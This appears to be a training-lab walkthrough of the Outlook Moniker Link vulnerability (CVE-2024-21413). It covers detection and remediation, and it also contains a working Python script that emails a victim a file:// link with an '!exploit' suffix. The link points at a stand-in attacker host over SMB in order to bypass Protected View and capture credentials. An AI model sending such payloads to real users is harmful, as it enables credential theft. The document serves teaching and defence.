Moniker Link (CVE-2024-21413)

Moniker Link

<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>

Server Message Block (SMB)
The Moniker Link type uses the hyperlink by file://, the vulnerability exists by modifying the hyperlink to include ! and some text in the Moniker Link which results in bypassing Outlook's Protected View.

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

Exploitation

• Craft an email to the victim with a Moniker Link that bypasses Outlook's "Protected View"
• Email the victim with Moniker Link

Moniker Link (CVE-2024-21413)

'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.0 | 19/02/2024
'''

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
    <p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

    </body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

# Convert the HTML string into bytes and attach it to the message object
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)

server = smtplib.SMTP('MAILSERVER', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\n Email delivered")
except Exception as error:
    print(error)
finally:
    server.quit()

• Takes an attacker & victim email. Normally, you would need to use your own SMTP server (this has already been provided for you in this room)
• Requires the password to authenticate. For this room, the password for attacker@monikerlink.thm is attacker
• Contains the email content (html_content), which contains our Moniker Link as a HTML hyperlink
• Then, fill in the "subject", "from" and "to" fields in the email
• Finally, it sends the email to the mail server

Detection

A Yara rule has been created by Florian Roth to detect emails containing the file:\\ element in the Moniker Link.

Remediation

• Updating Office through windows is strongly recommended
• Do not click random links
• Preview links before clicking them
• Forward suspicious emails to the respective department responsible for cyber security